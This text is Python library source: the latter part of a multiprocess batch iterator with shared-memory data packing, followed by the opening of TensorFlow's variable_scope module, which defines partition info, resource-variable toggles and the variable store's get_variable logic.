self.repeat = repeat
self.shuffle = shuffle
self.n_processes = n_processes or multiprocessing.cpu_count()
self.n_prefetch = max(n_prefetch, 1)
self.shared_mem = shared_mem
self._finalized = False
self._comm = _Communicator(self.n_prefetch)
self.reset()
self._prefetch_loop = _PrefetchLoop(
self.dataset, self.batch_size, self.repeat, self.shuffle,
self.n_processes, self.n_prefetch, self.shared_mem, self._comm,
self._interruption_testing)
        # Defer launching the prefetch thread until the worker pool is created,
        # so that forked worker processes do not inherit a background thread.
self._thread = None
def __next__(self):
measure_mode = False
if self._thread is None:
if self._prefetch_loop.measure_required():
measure_mode = True
batch, prefetch_state = self._prefetch_loop.measure()
self._thread = self._prefetch_loop.launch_thread()
del self._prefetch_loop
if not measure_mode:
batch, prefetch_state = self._comm.get()
(self.current_position, self.epoch, self.is_new_epoch,
self._previous_epoch_detail, self._order) = prefetch_state
if batch is None:
raise StopIteration
else:
return batch
next = __next__
def __del__(self):
# When `self.__del__()` is called, `self.__init__()` may not be
# finished. So some attributes may be undefined.
if not hasattr(self, '_finalized'):
# We don't know how to finalize this uninitialized object
return
if not hasattr(self, '_comm'):
self._comm = None
if not hasattr(self, '_thread'):
self._thread = None
if self._finalized:
return
self._finalized = True
if self._comm is None:
return
self._comm.terminate()
if self._thread is None:
return
while self._thread.is_alive():
self._thread.join(_response_time)
finalize = __del__
def __copy__(self):
other = MultiprocessIterator(
self.dataset, self.batch_size, self.repeat, self.shuffle,
self.n_processes, self.n_prefetch, self.shared_mem)
other.current_position = self.current_position
other.epoch = self.epoch
other.is_new_epoch = self.is_new_epoch
other._previous_epoch_detail = self._previous_epoch_detail
other._order = self._order
other._set_prefetch_state()
return other
@property
def epoch_detail(self):
return self.epoch + self.current_position / len(self.dataset)
@property
def previous_epoch_detail(self):
if self._previous_epoch_detail < 0:
return None
return self._previous_epoch_detail
def serialize(self, serializer):
self.current_position = serializer('current_position',
self.current_position)
self.epoch = serializer('epoch', self.epoch)
self.is_new_epoch = serializer('is_new_epoch', self.is_new_epoch)
try:
serializer('order', self._order)
except KeyError:
serializer('_order', self._order)
try:
self._previous_epoch_detail = serializer(
'previous_epoch_detail', self._previous_epoch_detail)
except KeyError:
# guess previous_epoch_detail for older version
self._previous_epoch_detail = self.epoch + \
(self.current_position - self.batch_size) / len(self.dataset)
if self.epoch_detail > 0:
self._previous_epoch_detail = max(
self._previous_epoch_detail, 0.)
else:
self._previous_epoch_detail = -1.
self._set_prefetch_state()
def reset(self):
if self._finalized:
raise NotImplementedError(
'Reset of finalized MultiProcessIterator is currently not '
'supported.')
self.current_position = 0
self.epoch = 0
self.is_new_epoch = False
# use -1 instead of None internally.
self._previous_epoch_detail = -1.
if self.shuffle:
self._order = numpy.random.permutation(len(self.dataset))
else:
self._order = None
self._set_prefetch_state()
def _set_prefetch_state(self):
prefetch_state = _PrefetchState(
current_position=self.current_position,
epoch=self.epoch,
is_new_epoch=self.is_new_epoch,
previous_epoch_detail=self._previous_epoch_detail,
order=self._order)
self._comm.reset(prefetch_state)
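# Illustrative usage sketch, not part of the original module: iterating a toy
# in-memory dataset with MultiprocessIterator. The helper name and the toy
# dataset are hypothetical.
def _example_multiprocess_iterator_usage():  # pragma: no cover
    dataset = [numpy.arange(3, dtype=numpy.float32) * i for i in range(10)]
    it = MultiprocessIterator(dataset, batch_size=4, n_processes=2,
                              repeat=False, shuffle=False)
    try:
        for batch in it:
            # Each batch is a list of at most ``batch_size`` dataset examples.
            assert len(batch) <= 4
    finally:
        it.finalize()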
class _Communicator(object):
STATUS_CONTINUE = 0
STATUS_RESET = 1
STATUS_TERMINATE = 2
def __init__(self, n_prefetch):
self.n_prefetch = n_prefetch
self._lock = threading.Lock()
self._not_empty_cond = threading.Condition(self._lock)
self._not_full_cond = threading.Condition(self._lock)
self._batch_queue = []
self._status = _Communicator.STATUS_CONTINUE
self._reset_count = 0
@property
def is_terminated(self):
with self._lock:
return self._status == _Communicator.STATUS_TERMINATE
# called from iterator
def get(self):
with self._lock:
while len(self._batch_queue) == 0:
self._not_empty_cond.wait(_response_time)
batch, prefetch_state = self._batch_queue.pop(0)
self._not_full_cond.notify()
return batch, prefetch_state
# called from iterator
def reset(self, prefetch_state):
with self._lock:
self._status = _Communicator.STATUS_RESET
self._prefetch_state = prefetch_state
self._batch_queue = []
self._not_full_cond.notify()
self._reset_count += 1
# called from iterator
def terminate(self):
with self._lock:
self._status = _Communicator.STATUS_TERMINATE
self._batch_queue = []
self._not_full_cond.notify()
self._reset_count += 1
# called from thread
def check(self):
with self._lock:
status = self._status
self._status = _Communicator.STATUS_CONTINUE
prefetch_state = None
if status == _Communicator.STATUS_RESET:
prefetch_state = self._prefetch_state
return status, prefetch_state, self._reset_count
# called from thread
def put(self, batch, prefetch_state, reset_count):
with self._lock:
if len(self._batch_queue) == self.n_prefetch:
self._not_full_cond.wait()
if reset_count == self._reset_count:
self._batch_queue.append((batch, prefetch_state))
self._not_empty_cond.notify()
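# Illustrative sketch, not part of the original module: the reset()/check()/
# put()/get() handshake between the iterator and the prefetch thread, run here
# single-threaded. The helper name is hypothetical.
def _example_communicator_roundtrip():  # pragma: no cover
    comm = _Communicator(n_prefetch=1)
    comm.reset(_PrefetchState(0, 0, False, -1., None))
    # check() hands the new prefetch state and reset count to the producer so
    # that batches produced before a reset are dropped.
    status, prefetch_state, reset_count = comm.check()
    assert status == _Communicator.STATUS_RESET
    comm.put(['batch-0'], prefetch_state, reset_count)
    batch, _ = comm.get()
    assert batch == ['batch-0']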
class _PrefetchLoop(object):
def __init__(self, dataset, batch_size, repeat, shuffle,
n_processes, n_prefetch, mem_size, comm,
_interruption_testing):
self.dataset = dataset
self.batch_size = batch_size
self.repeat = repeat
self.shuffle = shuffle
self.n_processes = n_processes
self.mem_size = mem_size
self.comm = comm
self._allocate_shared_memory()
self._pool = None
self._interruption_testing = _interruption_testing
def measure_required(self):
return self.mem_size is None
def measure(self):
status, prefetch_state, _ = self.comm.check()
if status == _Communicator.STATUS_RESET:
self.prefetch_state = prefetch_state
indices = self._proceed()
if indices is None: # stop iteration
batch = None
else:
batch = [self.dataset[idx] for idx in indices]
self.mem_size = max(map(_measure, batch))
self._allocate_shared_memory()
return batch, self.prefetch_state
def _allocate_shared_memory(self):
if self.measure_required():
self.mem_bulk = None
else:
self.mem_bulk = \
sharedctypes.RawArray('b', self.batch_size * self.mem_size)
def launch_thread(self):
self._pool = multiprocessing.Pool(
processes=self.n_processes,
initializer=_fetch_setup,
initargs=(self.dataset, self.mem_size, self.mem_bulk))
if self._interruption_testing:
pids = self._pool.map(_report_pid, range(self.n_processes))
print(' '.join(map(str, pids)))
sys.stdout.flush()
thread = threading.Thread(target=self._run, name='prefetch_loop')
thread.setDaemon(True)
thread.start()
return thread
def _run(self):
alive = True
try:
while alive:
alive = self._task()
finally:
self._pool.close()
self._pool.join()
def _task(self):
status, prefetch_state, reset_count = self.comm.check()
if status == _Communicator.STATUS_RESET:
self.prefetch_state = prefetch_state
elif status == _Communicator.STATUS_TERMINATE:
return False # stop loop
indices = self._proceed()
if indices is None: # stop iteration
batch = None
else:
future = self._pool.map_async(_fetch_run, enumerate(indices))
while True:
try:
data_all = future.get(_response_time)
except multiprocessing.TimeoutError:
if self.comm.is_terminated:
return False
else:
break
batch = [_unpack(data, self.mem_bulk) for data in data_all]
self.comm.put(batch, self.prefetch_state, reset_count)
return True
def _proceed(self):
n = len(self.dataset)
(pos, epoch, is_new_epoch,
previous_epoch_detail, order) = self.prefetch_state
if pos < self.batch_size and epoch > 0 and not self.repeat:
return None # stop iteration
previous_epoch_detail = epoch + pos / n
new_pos = pos + self.batch_size
if new_pos < n:
if order is None:
indices = numpy.arange(pos, new_pos)
else:
indices = order[pos:new_pos]
is_new_epoch = False
else:
new_pos = new_pos - n if self.repeat else 0
if order is None:
indices = numpy.arange(pos, n)
if self.repeat:
indices = \
numpy.concatenate((indices, numpy.arange(new_pos)))
else:
indices = order[pos:n]
if self.repeat:
order = numpy.random.permutation(n)
indices = \
numpy.concatenate((indices, order[:new_pos]))
epoch += 1
is_new_epoch = True
self.prefetch_state = _PrefetchState(
new_pos, epoch, is_new_epoch,
previous_epoch_detail, order)
return indices
# Using a parameterized function (e.g. a bound method) with Pool is tricky due
# to restrictions imposed by pickle; the set of picklable types also differs
# across Python versions. Using top-level functions with module-level globals
# seems to be the safest approach. This does not break thread safety or make
# global state visible across workers: each worker process has its own address
# space.
# To make static linter happy, we first initialize global variables.
_fetch_dataset = None
_fetch_mem_size = None
_fetch_mem_bulk = None
def _fetch_setup(dataset, mem_size, mem_bulk):
global _fetch_dataset, _fetch_mem_size, _fetch_mem_bulk
signal.signal(signal.SIGINT, signal.SIG_IGN)
_fetch_dataset = dataset
_fetch_mem_size = mem_size
_fetch_mem_bulk = mem_bulk
def _fetch_run(inputs):
i, index = inputs
data = _fetch_dataset[index]
if _fetch_mem_bulk is not None:
offset = i * _fetch_mem_size
limit = offset + _fetch_mem_size
data = _pack(data, _fetch_mem_bulk, offset, limit)
return data
def _report_pid(_): # for testing
return multiprocessing.current_process().pid
class _PackedNdarray(object):
def __init__(self, array, mem, offset):
self.shape = array.shape
self.dtype = array.dtype
self.nbytes = array.nbytes
self.size = array.size
self.offset = offset
total = self.offset + self.nbytes
if total > len(mem):
raise ValueError(
'Shared memory size is too small. expect:{}, actual:{}'.format(
total, len(mem)))
target = numpy.frombuffer(mem, self.dtype, self.size, self.offset)
target[...] = array.ravel()
def unpack(self, mem):
ret = numpy.frombuffer(mem, self.dtype, self.size, self.offset)
ret = ret.reshape(self.shape).copy()
return ret
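# Illustrative sketch, not part of the original module: round-tripping an
# array through a raw shared-memory buffer with _PackedNdarray. The helper
# name is hypothetical.
def _example_packed_ndarray_roundtrip():  # pragma: no cover
    array = numpy.arange(6, dtype=numpy.float32).reshape(2, 3)
    mem = sharedctypes.RawArray('b', array.nbytes)
    packed = _PackedNdarray(array, mem, 0)     # copies the data into ``mem``
    restored = packed.unpack(mem)              # reads it back out as a copy
    assert (restored == array).all()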
def _measure(data):
    # Sum the nbytes of every ndarray payload in one example.
    expect = 0
    t = type(data)
    if t is tuple or t is list:
        for v in data:
            if isinstance(v, numpy.ndarray):
                expect += v.nbytes
    elif t is dict:
        for v in six.itervalues(data):
            if isinstance(v, numpy.ndarray):
                expect += v.nbytes
    elif t is numpy.ndarray:
        expect = data.nbytes
    return expect
def _pack(data, mem, offset, limit):
if len(mem) == 0:
return data
t = type(data)
over = False
if t is tuple or t is list:
ret = []
for v in data:
if isinstance(v, numpy.ndarray):
if v.nbytes + offset > limit:
over = True
else:
v = _PackedNdarray(v, mem, offset)
offset += v.nbytes
ret.append(v)
data = t(ret)
elif t is dict:
ret = {}
for k, v in six.iteritems(data):
if isinstance(v, numpy.ndarray):
if v.nbytes + offset > limit:
over = True
else:
v = _PackedNdarray(v, mem, offset)
offset += v.nbytes
ret[k] = v
data = ret
elif t is numpy.ndarray:
if data.nbytes + offset > limit:
over = True
else:
data = _PackedNdarray(data, mem, offset)
offset += data.nbytes
if over:
expect = _measure(data)
warnings.warn(
'Shared memory size is too small.\n' +
'Please set shared_mem option for MultiprocessIterator.\n' +
'Expect shared memory size: {} bytes.\n'.format(expect) +
'Actual shared memory size: {} bytes.'.format(limit - offset),
UserWarning)
return data
def _unpack(data, mem):
if len(mem) == 0:
return data
t = type(data)
if t is tuple or t is list:
ret = []
for v in data:
if isinstance(v, _PackedNdarray):
v = v.unpack(mem)
ret.append(v)
data = t(ret)
elif t is dict:
ret = {}
for k, v in six.iteritems(data):
if isinstance(v, _PackedNdarray):
v = v.unpack(mem)
ret[k] = v
data = ret
elif t is _PackedNdarray:
data = data.unpack(mem)
return data
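# Illustrative sketch, not part of the original module: packing a dict-style
# example into shared memory and unpacking it again, as the worker processes
# and the prefetch loop do. The helper name is hypothetical.
def _example_pack_unpack():  # pragma: no cover
    example = {'x': numpy.zeros((2, 2), dtype=numpy.float32), 'label': 3}
    mem = sharedctypes.RawArray('b', 64)
    packed = _pack(example, mem, 0, len(mem))
    restored = _unpack(packed, mem)
    assert (restored['x'] == example['x']).all() and restored['label'] == 3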
|
variable_scope.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A class to store named variables and a scope operator to manage sharing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections as collections_lib
import copy
import enum # pylint: disable=g-bad-import-order
import functools
import sys
import threading
import traceback
import six
from six import iteritems
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python import tf2
from tensorflow.python.eager import context
from tensorflow.python.eager import monitoring
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import deprecation
from tensorflow.python.util import function_utils
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import tf_export
__all__ = [
"AUTO_REUSE", "VariableScope", "get_variable_scope", "get_variable",
"get_local_variable", "variable_scope", "variable_op_scope",
"no_regularizer", "VariableSynchronization", "VariableAggregation"
]
_api_usage_gauge = monitoring.BoolGauge(
"/tensorflow/api/resource_variables",
"Whether variable_scope.enable_resource_variables() is called.")
class _PartitionInfo(object):
"""Holds partition info used by initializer functions."""
def __init__(self, full_shape, var_offset):
"""Constructor.
Args:
full_shape: Tuple or list of `int` indicating the full combined shape of
the partitioned variables.
var_offset: Tuple or list of `int` specifying offset of this partition
with respect to the full variable for each dimension.
Raises:
TypeError: If `full_shape` or `var_offset` is not a sequence.
ValueError: If `full_shape` or `var_offset` differ in length. If
`var_offset` exceeds `full_shape` in any dimension.
"""
if not isinstance(full_shape, collections_lib.Sequence) or isinstance(
full_shape, six.string_types):
raise TypeError(
"`full_shape` must be a sequence (like tuple or list) instead of " +
type(full_shape).__name__)
if not isinstance(var_offset, collections_lib.Sequence) or isinstance(
var_offset, six.string_types):
raise TypeError(
"`var_offset` must be a sequence (like tuple or list) instead of " +
type(var_offset).__name__)
if len(var_offset) != len(full_shape):
raise ValueError(
"Expected equal length, but `var_offset` is of length {} while "
"full_shape is of length {}.".format(
len(var_offset), len(full_shape)))
for i in xrange(len(full_shape)):
offset = var_offset[i]
shape = full_shape[i]
if offset < 0 or offset >= shape:
raise ValueError(
"Expected 0 <= offset < shape but found offset={}, shape={} for "
"var_offset={}, full_shape={}".format(offset, shape, var_offset,
full_shape))
self._full_shape = full_shape
self._var_offset = var_offset
@property
def full_shape(self):
return self._full_shape
@property
def var_offset(self):
return self._var_offset
def single_offset(self, shape):
"""Returns the offset when the variable is partitioned in at most one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the offset in the dimension along which the variable is
partitioned. Returns 0 if the variable is not being partitioned.
Raises:
ValueError: Depending on self.single_slice_dim().
"""
single_slice_dim = self.single_slice_dim(shape)
# If this variable is not being partitioned at all, single_slice_dim() could
# return None.
if single_slice_dim is None:
return 0
return self.var_offset[single_slice_dim]
def single_slice_dim(self, shape):
"""Returns the slice dim when the variable is partitioned only in one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the dimension that the variable is partitioned in, or
`None` if the variable doesn't seem to be partitioned at all.
Raises:
TypeError: If `shape` is not a sequence.
ValueError: If `shape` is not the same length as `self.full_shape`. If
the variable is partitioned in more than one dimension.
"""
if not isinstance(shape, collections_lib.Sequence) or isinstance(
shape, six.string_types):
raise TypeError(
"`shape` must be a sequence (like tuple or list) instead of " +
type(shape).__name__)
if len(shape) != len(self.full_shape):
raise ValueError(
"Expected equal length, but received shape={} of length {} while "
"self.full_shape={} is of length {}.".format(shape, len(shape),
self.full_shape,
len(self.full_shape)))
for i in xrange(len(shape)):
if self.var_offset[i] + shape[i] > self.full_shape[i]:
raise ValueError(
"With self.var_offset={}, a partition of shape={} would exceed "
"self.full_shape={} in dimension {}.".format(
self.var_offset, shape, self.full_shape, i))
slice_dim = None
for i in xrange(len(shape)):
if shape[i] == self.full_shape[i]:
continue
if slice_dim is not None:
raise ValueError(
"Cannot use single_slice_dim() with shape={} and "
"self.full_shape={} since slice dim could be either dimension {} "
"or {}.".format(shape, self.full_shape, i, slice_dim))
slice_dim = i
return slice_dim
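# Illustrative sketch, not part of the TensorFlow source: how _PartitionInfo
# describes one shard of a [10, 20] variable split along dimension 0. The
# helper name is hypothetical.
def _example_partition_info():  # pylint: disable=unused-variable
  info = _PartitionInfo(full_shape=[10, 20], var_offset=[5, 0])
  shard_shape = [5, 20]  # the second half along dimension 0
  assert info.single_slice_dim(shard_shape) == 0
  assert info.single_offset(shard_shape) == 5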
class _ReuseMode(enum.Enum):
"""Mode for variable access within a variable scope."""
# Indicates that variables are to be fetched if they already exist or
# otherwise created.
AUTO_REUSE = 1
# TODO(alive): For TensorFlow 2.0, Deprecate True/False/None API in favor of
# enum values.
# REUSE_FALSE = 2
# REUSE_TRUE = 3
# TODO(apassos) remove these forwarding symbols.
VariableSynchronization = variables.VariableSynchronization # pylint: disable=invalid-name
VariableAggregation = variables.VariableAggregation # pylint: disable=invalid-name
AUTO_REUSE = _ReuseMode.AUTO_REUSE
tf_export(v1=["AUTO_REUSE"]).export_constant(__name__, "AUTO_REUSE")
AUTO_REUSE.__doc__ = """
When passed in as the value for the `reuse` flag, AUTO_REUSE indicates that
get_variable() should create the requested variable if it doesn't exist or, if
it does exist, simply return it.
"""
_DEFAULT_USE_RESOURCE = tf2.enabled()
@tf_export(v1=["enable_resource_variables"])
def enable_resource_variables():
"""Creates resource variables by default.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = True
_api_usage_gauge.get_cell().set(True)
@tf_export(v1=["resource_variables_enabled"])
def resource_variables_enabled():
"""Returns `True` if resource variables are enabled.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
return _DEFAULT_USE_RESOURCE
@deprecation.deprecated(
None, "non-resource variables are not supported in the long term")
@tf_export(v1=["disable_resource_variables"])
def disable_resource_variables():
"""Opts out of resource variables.
If your code needs tf.disable_resource_variables() to be called to work
properly please file a bug.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = False
_api_usage_gauge.get_cell().set(False)
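# Illustrative sketch, not part of the TensorFlow source: toggling the
# process-wide resource-variable default and reading it back. The helper name
# is hypothetical.
def _example_resource_variable_toggle():  # pylint: disable=unused-variable
  enable_resource_variables()
  assert resource_variables_enabled()
  disable_resource_variables()
  assert not resource_variables_enabled()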
class _VariableStore(object):
"""Variable store that carries a number of named Variables.
New variable names and new variables can be created; all stored
variables are initialized with the initializer passed to __init__.
Attributes:
vars: a dictionary with string names (same as passed in GetVar) as keys and
the corresponding TensorFlow Variables as values.
"""
def __init__(self):
"""Create a variable store."""
self._vars = {} # A dictionary of the stored TensorFlow variables.
self._partitioned_vars = {} # A dict of the stored PartitionedVariables.
self._store_eager_variables = False
def get_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with these parameters or create a new one.
If a variable with the given name is already stored, we return the stored
variable. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.compat.v1.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable.
regularizer: A (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation of
variables. When eager execution is enabled this argument is always
forced to be False.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`). `trainable`
defaults to `True`, unless `synchronization` is set to `ON_READ`, in
which case it defaults to `False`.
collections: List of graph collections keys to add the `Variable` to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the `Variable` reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and dtype of the `Variable` to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates
instead an experimental ResourceVariable which has well-defined
semantics. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be true.
custom_getter: Callable that takes as a first argument the true getter,
and allows overwriting the internal get_variable method. The signature
of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes: `def
custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed: `def
custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
        ```python
        def custom_getter(getter, name, *args, **kwargs):
          return getter(name + '_suffix', *args, **kwargs)
        ```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
      synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to
synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
or when violating reuse during variable creation.
RuntimeError: when eager execution is enabled and not called from an
EagerVariableStore.
"""
if custom_getter is not None and not callable(custom_getter):
raise ValueError("Passed a custom_getter which is not callable: %s" %
custom_getter)
with ops.init_scope():
if context.executing_eagerly():
# Variable creation and initialization takes place in `init_scope`s;
# as such, if an `init_scope` lifts us into the eager context, then we
# need to use `ResourceVariable`s.
use_resource = True
# Note that it's fine to reuse eager variables whose initialization was
# lifted from a function-building graph into the eager context (that's why
# the following clause is not wrapped in an `init_scope`); lifted variables
# are tracked by the graph's `VariableStore`.
if context.executing_eagerly():
if not self._store_eager_variables and reuse:
raise RuntimeError(
"When eager execution is enabled variable reuse is only supported"
" when an EagerVariableStore is active. See the documentation on"
" EagerVariableStore for example usage.")
if self._store_eager_variables:
reuse = AUTO_REUSE
# If a *_ref type is passed in an error would be triggered further down the
# stack. We prevent this using base_dtype to get a non-ref version of the
# type, before doing anything else. When _ref types are removed in favor of
# resources, this line can be removed.
try:
dtype = dtype.base_dtype
except AttributeError:
# .base_dtype not existing means that we will try and use the raw dtype
# which was passed in - this might be a NumPy type which is valid.
pass
# This is the main logic of get_variable. However, custom_getter
# may override this logic. So we save it as a callable and pass
# it to custom_getter.
# Note: the parameters of _true_getter, and their documentation, match
# *exactly* item-for-item with the docstring of this method.
def _true_getter( # pylint: disable=missing-docstring
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
is_scalar = (
shape is not None and isinstance(shape, collections_lib.Sequence) and
not shape)
# Partitioned variable case
if partitioner is not None and not is_scalar:
if not callable(partitioner):
raise ValueError("Partitioner must be callable, but received: %s" %
partitioner)
with ops.name_scope(None):
return self._get_partitioned_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Special case for partitioned variable to allow reuse without having to
# specify partitioner.
if (reuse is True and partitioner is None
and name in self._partitioned_vars):
return self._get_partitioned_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=None,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Single variable case
if "%s/part_0" % name in self._vars:
raise ValueError(
"No partitioner was provided, but a partitioned version of the "
"variable was found: %s/part_0. Perhaps a variable of the same "
"name was already created with partitioning?" % name)
return self._get_single_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
synchronization, aggregation, trainable = (
variables.validate_synchronization_aggregation_trainable(
synchronization, aggregation, trainable, name))
if custom_getter is not None:
# Handle backwards compatibility with getter arguments that were added
# to the API after users started writing custom getters.
custom_getter_kwargs = {
"getter": _true_getter,
"name": name,
"shape": shape,
"dtype": dtype,
"initializer": initializer,
"regularizer": regularizer,
"reuse": reuse,
"trainable": trainable,
"collections": collections,
"caching_device": caching_device,
"partitioner": partitioner,
"validate_shape": validate_shape,
"use_resource": use_resource,
"synchronization": synchronization,
"aggregation": aggregation,
}
# `fn_args` and `has_kwargs` can handle functions, `functools.partial`,
# `lambda`.
if ("constraint" in function_utils.fn_args(custom_getter) or
function_utils.has_kwargs(custom_getter)):
custom_getter_kwargs["constraint"] = constraint
return custom_getter(**custom_getter_kwargs)
else:
return _true_getter(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
name,
partitioner,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.compat.v1.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: the name of the new or existing sharded variable.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
shape: shape of the new or existing sharded variable.
dtype: type of the new or existing sharded variable (defaults to
`DT_FLOAT`).
initializer: initializer for the sharded variable.
regularizer: a (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
